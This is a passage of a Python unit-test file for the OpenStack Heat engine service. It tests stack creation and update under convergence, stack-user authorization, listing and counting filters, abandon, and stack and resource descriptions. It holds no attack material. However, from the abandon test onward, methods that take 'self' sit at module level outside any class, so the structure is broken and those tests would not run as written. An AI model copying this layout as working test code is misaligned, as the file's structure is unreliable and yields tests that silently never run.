                           env=stack.env).AndReturn(stack.t)
        environment.Environment(params).AndReturn(stack.env)
        parser.Stack(self.ctx, stack.name,
                     stack.t, owner_id=None,
                     parent_resource=None,
                     nested_depth=0, user_creds_id=None,
                     stack_user_project_id=None,
                     timeout_mins=60,
                     disable_rollback=False,
                     convergence=True).AndReturn(stack)
        self.m.StubOutWithMock(stack, 'validate')
        stack.validate().AndReturn(None)
        self.m.ReplayAll()
        api_args = {'timeout_mins': 60, 'disable_rollback': False}
        result = self.man.create_stack(self.ctx, 'service_create_test_stack',
                                       template, params, None, api_args)
        db_stack = stack_object.Stack.get_by_id(self.ctx, result['stack_id'])
        # the convergence flag must be persisted on the new stack row
        self.assertEqual(db_stack.convergence, True)
        self.assertEqual(result['stack_id'], db_stack.id)
        self.m.VerifyAll()

    def test_stack_create_enabled_convergence_engine(self):
        stack_name = 'service_create_test_stack'
        self._test_stack_create_convergence(stack_name)

    def test_stack_update_enabled_convergence_engine(self):
        # Updating an existing convergence stack keeps convergence enabled
        # and returns the original stack identifier.
        stack_name = 'service_update_test_stack'
        params = {'foo': 'bar'}
        template = '{ "Template": "data" }'
        old_stack = tools.get_stack(stack_name, self.ctx,
                                    template=tools.string_template_five,
                                    convergence=True)
        old_stack.timeout_mins = 1
        sid = old_stack.store()
        s = stack_object.Stack.get_by_id(self.ctx, sid)
        stack = tools.get_stack(stack_name, self.ctx,
                                template=tools.string_template_five_update,
                                convergence=True)
        self._stub_update_mocks(s, old_stack)
        templatem.Template(template, files=None,
                           env=stack.env).AndReturn(stack.t)
        environment.Environment(params).AndReturn(stack.env)
        # the updated stack must inherit identity/convergence data from
        # the existing one
        parser.Stack(self.ctx, stack.name,
                     stack.t,
                     owner_id=old_stack.owner_id,
                     nested_depth=old_stack.nested_depth,
                     user_creds_id=old_stack.user_creds_id,
                     stack_user_project_id=old_stack.stack_user_project_id,
                     timeout_mins=60,
                     disable_rollback=False,
                     parent_resource=None,
                     strict_validate=True,
                     tenant_id=old_stack.tenant_id,
                     username=old_stack.username,
                     convergence=old_stack.convergence,
                     current_traversal=old_stack.current_traversal,
                     prev_raw_template_id=old_stack.prev_raw_template_id,
                     current_deps=old_stack.current_deps).AndReturn(stack)
        self.m.StubOutWithMock(stack, 'validate')
        stack.validate().AndReturn(None)
        self.m.ReplayAll()
        api_args = {'timeout_mins': 60, 'disable_rollback': False}
        result = self.man.update_stack(self.ctx, old_stack.identifier(),
                                       template, params, None, api_args)
        self.assertEqual(old_stack.convergence, True)
        self.assertEqual(old_stack.identifier(), result)
        self.assertIsInstance(result, dict)
        self.assertTrue(result['stack_id'])
        self.m.VerifyAll()
class StackServiceAuthorizeTest(common.HeatTestCase):
    """Tests for EngineService._authorize_stack_user credential checks."""

    def setUp(self):
        super(StackServiceAuthorizeTest, self).setUp()
        self.ctx = utils.dummy_context(tenant_id='stack_service_test_tenant')
        self.eng = service.EngineService('a-host', 'a-topic')
        self.eng.engine_id = 'engine-fake-uuid'
        cfg.CONF.set_default('heat_stack_user_role', 'stack_user_role')

    @tools.stack_context('service_authorize_stack_user_nocreds_test_stack')
    def test_stack_authorize_stack_user_nocreds(self):
        # no credentials in the context -> authorization is denied
        self.assertFalse(self.eng._authorize_stack_user(self.ctx,
                                                        self.stack,
                                                        'foo'))

    @tools.stack_context('service_authorize_user_attribute_error_test_stack')
    def test_stack_authorize_stack_user_attribute_error(self):
        # AttributeError while parsing the credentials is swallowed and
        # treated as "not authorized"
        self.m.StubOutWithMock(json, 'loads')
        json.loads(None).AndRaise(AttributeError)
        self.m.ReplayAll()
        self.assertFalse(self.eng._authorize_stack_user(self.ctx,
                                                        self.stack,
                                                        'foo'))
        self.m.VerifyAll()

    @tools.stack_context('service_authorize_stack_user_type_error_test_stack')
    def test_stack_authorize_stack_user_type_error(self):
        # TypeError while parsing the credentials is likewise treated as
        # "not authorized"
        self.m.StubOutWithMock(json, 'loads')
        json.loads(mox.IgnoreArg()).AndRaise(TypeError)
        self.m.ReplayAll()
        self.assertFalse(self.eng._authorize_stack_user(self.ctx,
                                                        self.stack,
                                                        'foo'))
        self.m.VerifyAll()

    def test_stack_authorize_stack_user(self):
        # ec2 credentials grant access only to the resource allowed by the
        # stack's AccessPolicy ('WebServer' in user_policy_template)
        self.ctx = utils.dummy_context()
        self.ctx.aws_creds = '{"ec2Credentials": {"access": "4567"}}'
        stack_name = 'stack_authorize_stack_user'
        stack = tools.get_stack(stack_name, self.ctx, user_policy_template)
        self.stack = stack
        fc = tools.setup_mocks(self.m, stack)
        self.patchobject(fc.servers, 'delete',
                         side_effect=fakes_nova.fake_exception())
        self.m.ReplayAll()
        stack.store()
        stack.create()
        self.assertTrue(self.eng._authorize_stack_user(
            self.ctx, self.stack, 'WebServer'))
        self.assertFalse(self.eng._authorize_stack_user(
            self.ctx, self.stack, 'CfnUser'))
        self.assertFalse(self.eng._authorize_stack_user(
            self.ctx, self.stack, 'NoSuchResource'))
        self.m.VerifyAll()

    def test_stack_authorize_stack_user_user_id(self):
        # a registered access-allowed handler authorizes by user_id and
        # resource name
        self.ctx = utils.dummy_context(user_id=str(uuid.uuid4()))
        stack_name = 'stack_authorize_stack_user_user_id'
        stack = tools.get_stack(stack_name, self.ctx, server_config_template)
        self.stack = stack

        def handler(resource_name):
            return resource_name == 'WebServer'

        self.stack.register_access_allowed_handler(self.ctx.user_id, handler)
        # matching credential_id and resource_name
        self.assertTrue(self.eng._authorize_stack_user(
            self.ctx, self.stack, 'WebServer'))
        # not matching resource_name
        self.assertFalse(self.eng._authorize_stack_user(
            self.ctx, self.stack, 'NoSuchResource'))
        # not matching credential_id
        self.ctx.user_id = str(uuid.uuid4())
        self.assertFalse(self.eng._authorize_stack_user(
            self.ctx, self.stack, 'WebServer'))
class StackServiceTest(common.HeatTestCase):
    """Tests for miscellaneous EngineService stack operations."""

    def setUp(self):
        super(StackServiceTest, self).setUp()
        self.ctx = utils.dummy_context(tenant_id='stack_service_test_tenant')
        self.eng = service.EngineService('a-host', 'a-topic')
        # use the dummy thread group manager from the test tools
        self.eng.thread_group_mgr = tools.DummyThreadGroupManager()
        self.eng.engine_id = 'engine-fake-uuid'
        cfg.CONF.set_default('heat_stack_user_role', 'stack_user_role')
    @tools.stack_context('service_identify_test_stack', False)
    def test_stack_identify(self):
        # identify_stack by stack name returns the full identifier
        self.m.StubOutWithMock(parser.Stack, 'load')
        parser.Stack.load(self.ctx,
                          stack=mox.IgnoreArg()).AndReturn(self.stack)
        self.m.ReplayAll()
        identity = self.eng.identify_stack(self.ctx, self.stack.name)
        self.assertEqual(self.stack.identifier(), identity)
        self.m.VerifyAll()

    @tools.stack_context('ef0c41a4-644f-447c-ad80-7eecb0becf79', False)
    def test_stack_identify_by_name_in_uuid(self):
        # a stack whose *name* looks like a UUID is still found by name
        self.m.StubOutWithMock(parser.Stack, 'load')
        parser.Stack.load(self.ctx,
                          stack=mox.IgnoreArg()).AndReturn(self.stack)
        self.m.ReplayAll()
        identity = self.eng.identify_stack(self.ctx, self.stack.name)
        self.assertEqual(self.stack.identifier(), identity)
        self.m.VerifyAll()

    @tools.stack_context('service_identify_uuid_test_stack', False)
    def test_stack_identify_uuid(self):
        # identify_stack also accepts the stack id
        self.m.StubOutWithMock(parser.Stack, 'load')
        parser.Stack.load(self.ctx,
                          stack=mox.IgnoreArg()).AndReturn(self.stack)
        self.m.ReplayAll()
        identity = self.eng.identify_stack(self.ctx, self.stack.id)
        self.assertEqual(self.stack.identifier(), identity)
        self.m.VerifyAll()

    def test_stack_identify_nonexist(self):
        # unknown stack names surface as StackNotFound over RPC
        ex = self.assertRaises(dispatcher.ExpectedException,
                               self.eng.identify_stack, self.ctx, 'wibble')
        self.assertEqual(exception.StackNotFound, ex.exc_info[0])

    @tools.stack_context('service_create_existing_test_stack', False)
    def test_stack_create_existing(self):
        # creating a stack whose name is already taken raises StackExists
        ex = self.assertRaises(dispatcher.ExpectedException,
                               self.eng.create_stack, self.ctx,
                               self.stack.name, self.stack.t.t, {}, None, {})
        self.assertEqual(exception.StackExists, ex.exc_info[0])

    @tools.stack_context('service_name_tenants_test_stack', False)
    def test_stack_by_name_tenants(self):
        # lookups by name are scoped to the context's tenant
        self.assertEqual(
            self.stack.id,
            stack_object.Stack.get_by_name(self.ctx, self.stack.name).id)
        ctx2 = utils.dummy_context(tenant_id='stack_service_test_tenant2')
        self.assertIsNone(stack_object.Stack.get_by_name(
            ctx2,
            self.stack.name))
    @tools.stack_context('service_list_all_test_stack')
    def test_stack_list_all(self):
        # list_stacks returns one formatted entry per stored stack
        self.m.StubOutWithMock(parser.Stack, '_from_db')
        parser.Stack._from_db(
            self.ctx, mox.IgnoreArg(),
            resolve_data=False
        ).AndReturn(self.stack)
        self.m.ReplayAll()
        sl = self.eng.list_stacks(self.ctx)
        self.assertEqual(1, len(sl))
        for s in sl:
            # each entry carries the standard formatted-stack keys
            self.assertIn('creation_time', s)
            self.assertIn('updated_time', s)
            self.assertIn('stack_identity', s)
            self.assertIsNotNone(s['stack_identity'])
            self.assertIn('stack_name', s)
            self.assertEqual(self.stack.name, s['stack_name'])
            self.assertIn('stack_status', s)
            self.assertIn('stack_status_reason', s)
            self.assertIn('description', s)
            self.assertIn('WordPress', s['description'])
        self.m.VerifyAll()
    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_passes_marker_info(self, mock_stack_get_all):
        # the paging arguments are forwarded positionally to Stack.get_all;
        # only their slots are pinned, everything else is ANY
        limit = object()
        marker = object()
        sort_keys = object()
        sort_dir = object()
        self.eng.list_stacks(self.ctx, limit=limit, marker=marker,
                             sort_keys=sort_keys, sort_dir=sort_dir)
        mock_stack_get_all.assert_called_once_with(self.ctx,
                                                   limit,
                                                   sort_keys,
                                                   marker,
                                                   sort_dir,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_passes_filtering_info(self, mock_stack_get_all):
        # only the filters slot is pinned
        filters = {'foo': 'bar'}
        self.eng.list_stacks(self.ctx, filters=filters)
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   filters,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_tenant_safe_defaults_to_true(self, mock_stack_get_all):
        # tenant_safe defaults to True when not passed by the caller
        self.eng.list_stacks(self.ctx)
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   True,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_passes_tenant_safe_info(self, mock_stack_get_all):
        # an explicit tenant_safe=False is forwarded unchanged
        self.eng.list_stacks(self.ctx, tenant_safe=False)
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   False,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )
    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_show_nested(self, mock_stack_get_all):
        # the True below pins the show_nested positional slot
        self.eng.list_stacks(self.ctx, show_nested=True)
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   True,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_show_deleted(self, mock_stack_get_all):
        # the True below pins the show_deleted positional slot
        self.eng.list_stacks(self.ctx, show_deleted=True)
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   True,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_show_hidden(self, mock_stack_get_all):
        # the True below pins the show_hidden positional slot
        self.eng.list_stacks(self.ctx, show_hidden=True)
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   True,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )
    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_tags(self, mock_stack_get_all):
        # the tag list pins the tags positional slot
        self.eng.list_stacks(self.ctx, tags=['foo', 'bar'])
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   ['foo', 'bar'],
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_tags_any(self, mock_stack_get_all):
        # the tag list pins the tags_any positional slot
        self.eng.list_stacks(self.ctx, tags_any=['foo', 'bar'])
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   ['foo', 'bar'],
                                                   mock.ANY,
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_not_tags(self, mock_stack_get_all):
        # the tag list pins the not_tags positional slot
        self.eng.list_stacks(self.ctx, not_tags=['foo', 'bar'])
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   ['foo', 'bar'],
                                                   mock.ANY,
                                                   )

    @mock.patch.object(stack_object.Stack, 'get_all')
    def test_stack_list_not_tags_any(self, mock_stack_get_all):
        # the tag list pins the not_tags_any positional slot
        self.eng.list_stacks(self.ctx, not_tags_any=['foo', 'bar'])
        mock_stack_get_all.assert_called_once_with(mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   mock.ANY,
                                                   ['foo', 'bar'],
                                                   )
    @mock.patch.object(stack_object.Stack, 'count_all')
    def test_count_stacks_passes_filter_info(self, mock_stack_count_all):
        # count_stacks forwards its options to Stack.count_all as kwargs
        self.eng.count_stacks(self.ctx, filters={'foo': 'bar'})
        mock_stack_count_all.assert_called_once_with(mock.ANY,
                                                     filters={'foo': 'bar'},
                                                     tenant_safe=mock.ANY,
                                                     show_deleted=False,
                                                     show_nested=False,
                                                     show_hidden=False,
                                                     tags=None,
                                                     tags_any=None,
                                                     not_tags=None,
                                                     not_tags_any=None)

    @mock.patch.object(stack_object.Stack, 'count_all')
    def test_count_stacks_tenant_safe_default_true(self, mock_stack_count_all):
        # tenant_safe defaults to True when not passed by the caller
        self.eng.count_stacks(self.ctx)
        mock_stack_count_all.assert_called_once_with(mock.ANY,
                                                     filters=mock.ANY,
                                                     tenant_safe=True,
                                                     show_deleted=False,
                                                     show_nested=False,
                                                     show_hidden=False,
                                                     tags=None,
                                                     tags_any=None,
                                                     not_tags=None,
                                                     not_tags_any=None)

    @mock.patch.object(stack_object.Stack, 'count_all')
    def test_count_stacks_passes_tenant_safe_info(self, mock_stack_count_all):
        # an explicit tenant_safe=False is forwarded unchanged
        self.eng.count_stacks(self.ctx, tenant_safe=False)
        mock_stack_count_all.assert_called_once_with(mock.ANY,
                                                     filters=mock.ANY,
                                                     tenant_safe=False,
                                                     show_deleted=False,
                                                     show_nested=False,
                                                     show_hidden=False,
                                                     tags=None,
                                                     tags_any=None,
                                                     not_tags=None,
                                                     not_tags_any=None)

    @mock.patch.object(stack_object.Stack, 'count_all')
    def test_count_stacks_show_nested(self, mock_stack_count_all):
        self.eng.count_stacks(self.ctx, show_nested=True)
        mock_stack_count_all.assert_called_once_with(mock.ANY,
                                                     filters=mock.ANY,
                                                     tenant_safe=True,
                                                     show_deleted=False,
                                                     show_nested=True,
                                                     show_hidden=False,
                                                     tags=None,
                                                     tags_any=None,
                                                     not_tags=None,
                                                     not_tags_any=None)

    @mock.patch.object(stack_object.Stack, 'count_all')
    def test_count_stack_show_deleted(self, mock_stack_count_all):
        self.eng.count_stacks(self.ctx, show_deleted=True)
        mock_stack_count_all.assert_called_once_with(mock.ANY,
                                                     filters=mock.ANY,
                                                     tenant_safe=True,
                                                     show_deleted=True,
                                                     show_nested=False,
                                                     show_hidden=False,
                                                     tags=None,
                                                     tags_any=None,
                                                     not_tags=None,
                                                     not_tags_any=None)

    @mock.patch.object(stack_object.Stack, 'count_all')
    def test_count_stack_show_hidden(self, mock_stack_count_all):
        self.eng.count_stacks(self.ctx, show_hidden=True)
        mock_stack_count_all.assert_called_once_with(mock.ANY,
                                                     filters=mock.ANY,
                                                     tenant_safe=True,
                                                     show_deleted=False,
                                                     show_nested=False,
                                                     show_hidden=True,
                                                     tags=None,
                                                     tags_any=None,
                                                     not_tags=None,
                                                     not_tags_any=None)
@tools.stack_context('service_abandon_stack')
def test_abandon_stack(self):
    """abandon_stack returns the complete abandon data set for a stack."""
    cfg.CONF.set_override('enable_stack_abandon', True)
    self.m.StubOutWithMock(parser.Stack, 'load')
    parser.Stack.load(self.ctx,
                      stack=mox.IgnoreArg()).AndReturn(self.stack)
    # Expected dump of the single WebServer resource in the fixture stack.
    expected_res = {
        u'WebServer': {
            'action': 'CREATE',
            'metadata': {},
            'name': u'WebServer',
            'resource_data': {},
            'resource_id': '9999',
            'status': 'COMPLETE',
            'type': u'AWS::EC2::Instance'}}
    self.m.ReplayAll()
    ret = self.eng.abandon_stack(self.ctx, self.stack.identifier())
    # The abandon payload carries exactly ten top-level keys.
    self.assertEqual(10, len(ret))
    self.assertEqual('CREATE', ret['action'])
    self.assertEqual('COMPLETE', ret['status'])
    self.assertEqual('service_abandon_stack', ret['name'])
    self.assertEqual({}, ret['files'])
    self.assertIn('id', ret)
    self.assertEqual(expected_res, ret['resources'])
    self.assertEqual(self.stack.t.t, ret['template'])
    self.assertIn('project_id', ret)
    self.assertIn('stack_user_project_id', ret)
    self.assertIn('environment', ret)
    self.assertIn('files', ret)
    self.m.VerifyAll()
def test_stack_describe_nonexistent(self):
    """show_stack on an unknown identifier surfaces StackNotFound."""
    non_exist_identifier = identifier.HeatIdentifier(
        self.ctx.tenant_id, 'wibble',
        '18d06e2e-44d3-4bef-9fbf-52480d604b02')
    stack_not_found_exc = exception.StackNotFound(stack_name='test')
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    service.EngineService._get_stack(
        self.ctx, non_exist_identifier,
        show_deleted=True).AndRaise(stack_not_found_exc)
    self.m.ReplayAll()
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.show_stack,
                           self.ctx, non_exist_identifier)
    self.assertEqual(exception.StackNotFound, ex.exc_info[0])
    self.m.VerifyAll()

def test_stack_describe_bad_tenant(self):
    """show_stack across tenants surfaces InvalidTenant."""
    non_exist_identifier = identifier.HeatIdentifier(
        'wibble', 'wibble',
        '18d06e2e-44d3-4bef-9fbf-52480d604b02')
    invalid_tenant_exc = exception.InvalidTenant(target='test',
                                                 actual='test')
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    service.EngineService._get_stack(
        self.ctx, non_exist_identifier,
        show_deleted=True).AndRaise(invalid_tenant_exc)
    self.m.ReplayAll()
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.show_stack,
                           self.ctx, non_exist_identifier)
    self.assertEqual(exception.InvalidTenant, ex.exc_info[0])
    self.m.VerifyAll()

@tools.stack_context('service_describe_test_stack', False)
def test_stack_describe(self):
    """show_stack for one identifier returns the expected summary keys."""
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
    service.EngineService._get_stack(self.ctx,
                                     self.stack.identifier(),
                                     show_deleted=True).AndReturn(s)
    self.m.ReplayAll()
    sl = self.eng.show_stack(self.ctx, self.stack.identifier())
    self.assertEqual(1, len(sl))
    s = sl[0]
    self.assertIn('creation_time', s)
    self.assertIn('updated_time', s)
    self.assertIn('stack_identity', s)
    self.assertIsNotNone(s['stack_identity'])
    self.assertIn('stack_name', s)
    self.assertEqual(self.stack.name, s['stack_name'])
    self.assertIn('stack_status', s)
    self.assertIn('stack_status_reason', s)
    self.assertIn('description', s)
    self.assertIn('WordPress', s['description'])
    self.assertIn('parameters', s)
    self.m.VerifyAll()

@tools.stack_context('service_describe_all_test_stack', False)
def test_stack_describe_all(self):
    """show_stack(None) describes every stack (one in this fixture)."""
    sl = self.eng.show_stack(self.ctx, None)
    self.assertEqual(1, len(sl))
    s = sl[0]
    self.assertIn('creation_time', s)
    self.assertIn('updated_time', s)
    self.assertIn('stack_identity', s)
    self.assertIsNotNone(s['stack_identity'])
    self.assertIn('stack_name', s)
    self.assertEqual(self.stack.name, s['stack_name'])
    self.assertIn('stack_status', s)
    self.assertIn('stack_status_reason', s)
    self.assertIn('description', s)
    self.assertIn('WordPress', s['description'])
    self.assertIn('parameters', s)
@mock.patch('heat.engine.template._get_template_extension_manager')
def test_list_template_versions(self, templ_mock):
    """Template versions are reported with their format type (cfn/hot)."""
    plugins = {'a.b': cfntemplate.CfnTemplate,
               'c.d': hottemplate.HOTemplate20130523}

    class FakeMgr(object):
        def names(self):
            return ['a.b', 'c.d']

        def __getitem__(self, item):
            ext = mock.MagicMock()
            ext.plugin = plugins[item]
            return ext

    templ_mock.return_value = FakeMgr()
    result = self.eng.list_template_versions(self.ctx)
    self.assertEqual([{'version': 'a.b', 'type': 'cfn'},
                      {'version': 'c.d', 'type': 'hot'}], result)
@mock.patch('heat.engine.template._get_template_extension_manager')
def test_list_template_functions(self, templ_mock):
    """list_template_functions returns name/summary pairs and omits the
    function registered as hot_functions.Removed."""

    # NOTE: these docstrings are fixture data -- the expected descriptions
    # below are extracted from them -- so their text must not change.
    class DummyFunc1(object):
        """
        Dummy Func1

        Dummy Func1 Long Description
        """

    class DummyFunc2(object):
        """Dummy Func2

        Dummy Func2 Long Description
        """

    plugin_mock = mock.Mock(
        functions={'dummy1': DummyFunc1,
                   'dummy2': DummyFunc2,
                   'removed': hot_functions.Removed})
    dummy_tmpl = mock.Mock(plugin=plugin_mock)

    class DummyMgr(object):
        def __getitem__(self, item):
            return dummy_tmpl

    templ_mock.return_value = DummyMgr()
    functions = self.eng.list_template_functions(self.ctx, 'dummytemplate')
    expected = [{'functions': 'dummy1',
                 'description': 'Dummy Func1'},
                {'functions': 'dummy2',
                 'description': 'Dummy Func2'}]
    # Compare order-insensitively by sorting both lists on function name.
    self.assertEqual(sorted(expected, key=lambda k: k['functions']),
                     sorted(functions, key=lambda k: k['functions']))
def _test_describe_stack_resource(self):
    """Shared assertions for describe_stack_resource on 'WebServer'."""
    self.m.StubOutWithMock(parser.Stack, 'load')
    parser.Stack.load(self.ctx,
                      stack=mox.IgnoreArg()).AndReturn(self.stack)
    self.m.ReplayAll()
    r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
                                         'WebServer', with_attr=None)
    # The record must expose identity, status and attribute fields.
    self.assertIn('resource_identity', r)
    self.assertIn('description', r)
    self.assertIn('updated_time', r)
    self.assertIn('stack_identity', r)
    self.assertIsNotNone(r['stack_identity'])
    self.assertIn('stack_name', r)
    self.assertEqual(self.stack.name, r['stack_name'])
    self.assertIn('metadata', r)
    self.assertIn('resource_status', r)
    self.assertIn('resource_status_reason', r)
    self.assertIn('resource_type', r)
    self.assertIn('physical_resource_id', r)
    self.assertIn('resource_name', r)
    self.assertIn('attributes', r)
    self.assertEqual('WebServer', r['resource_name'])
    self.m.VerifyAll()
@tools.stack_context('service_stack_resource_describe__test_stack')
def test_stack_resource_describe(self):
    """Happy path: delegates to the shared describe helper."""
    self._test_describe_stack_resource()

def test_stack_resource_describe_nonexist_stack(self):
    """Describing a resource of an unknown stack raises StackNotFound."""
    non_exist_identifier = identifier.HeatIdentifier(
        self.ctx.tenant_id,
        'wibble',
        '18d06e2e-44d3-4bef-9fbf-52480d604b02')
    stack_not_found_exc = exception.StackNotFound(stack_name='test')
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    service.EngineService._get_stack(
        self.ctx, non_exist_identifier).AndRaise(stack_not_found_exc)
    self.m.ReplayAll()
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.describe_stack_resource,
                           self.ctx, non_exist_identifier, 'WebServer')
    self.assertEqual(exception.StackNotFound, ex.exc_info[0])
    self.m.VerifyAll()

@tools.stack_context('service_resource_describe_nonexist_test_stack')
def test_stack_resource_describe_nonexist_resource(self):
    """An unknown resource name raises ResourceNotFound."""
    self.m.StubOutWithMock(parser.Stack, 'load')
    parser.Stack.load(self.ctx,
                      stack=mox.IgnoreArg()).AndReturn(self.stack)
    self.m.ReplayAll()
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.describe_stack_resource,
                           self.ctx, self.stack.identifier(), 'foo')
    self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
    self.m.VerifyAll()

@tools.stack_context('service_resource_describe_noncreated_test_stack',
                     create_res=False)
def test_stack_resource_describe_noncreated_resource(self):
    """Describing works even when the resource was never created."""
    self._test_describe_stack_resource()

@tools.stack_context('service_resource_describe_user_deny_test_stack')
def test_stack_resource_describe_stack_user_deny(self):
    """A stack-user role without authorization gets Forbidden."""
    self.ctx.roles = [cfg.CONF.heat_stack_user_role]
    self.m.StubOutWithMock(service.EngineService, '_authorize_stack_user')
    service.EngineService._authorize_stack_user(self.ctx, mox.IgnoreArg(),
                                                'foo').AndReturn(False)
    self.m.ReplayAll()
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.describe_stack_resource,
                           self.ctx, self.stack.identifier(), 'foo')
    self.assertEqual(exception.Forbidden, ex.exc_info[0])
    self.m.VerifyAll()
@tools.stack_context('service_resources_describe_test_stack')
def test_stack_resources_describe(self):
    """describe_stack_resources returns full records for a named resource."""
    self.m.StubOutWithMock(parser.Stack, 'load')
    parser.Stack.load(self.ctx,
                      stack=mox.IgnoreArg()).AndReturn(self.stack)
    self.m.ReplayAll()
    resources = self.eng.describe_stack_resources(self.ctx,
                                                  self.stack.identifier(),
                                                  'WebServer')
    self.assertEqual(1, len(resources))
    r = resources[0]
    self.assertIn('resource_identity', r)
    self.assertIn('description', r)
    self.assertIn('updated_time', r)
    self.assertIn('stack_identity', r)
    self.assertIsNotNone(r['stack_identity'])
    self.assertIn('stack_name', r)
    self.assertEqual(self.stack.name, r['stack_name'])
    self.assertIn('resource_status', r)
    self.assertIn('resource_status_reason', r)
    self.assertIn('resource_type', r)
    self.assertIn('physical_resource_id', r)
    self.assertIn('resource_name', r)
    self.assertEqual('WebServer', r['resource_name'])
    self.m.VerifyAll()

@tools.stack_context('service_resources_describe_no_filter_test_stack')
def test_stack_resources_describe_no_filter(self):
    """With no name filter, all resources (one here) are returned."""
    self.m.StubOutWithMock(parser.Stack, 'load')
    parser.Stack.load(self.ctx,
                      stack=mox.IgnoreArg()).AndReturn(self.stack)
    self.m.ReplayAll()
    resources = self.eng.describe_stack_resources(self.ctx,
                                                  self.stack.identifier(),
                                                  None)
    self.assertEqual(1, len(resources))
    r = resources[0]
    self.assertIn('resource_name', r)
    self.assertEqual('WebServer', r['resource_name'])
    self.m.VerifyAll()
def test_stack_resources_describe_bad_lookup(self):
    """A None stack identity propagates the underlying TypeError."""
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    service.EngineService._get_stack(
        self.ctx, None).AndRaise(TypeError)
    self.m.ReplayAll()
    self.assertRaises(TypeError,
                      self.eng.describe_stack_resources,
                      self.ctx, None, 'WebServer')
    self.m.VerifyAll()

def test_stack_resources_describe_nonexist_stack(self):
    """Describing resources of an unknown stack raises StackNotFound."""
    non_exist_identifier = identifier.HeatIdentifier(
        self.ctx.tenant_id, 'wibble',
        '18d06e2e-44d3-4bef-9fbf-52480d604b02')
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.describe_stack_resources,
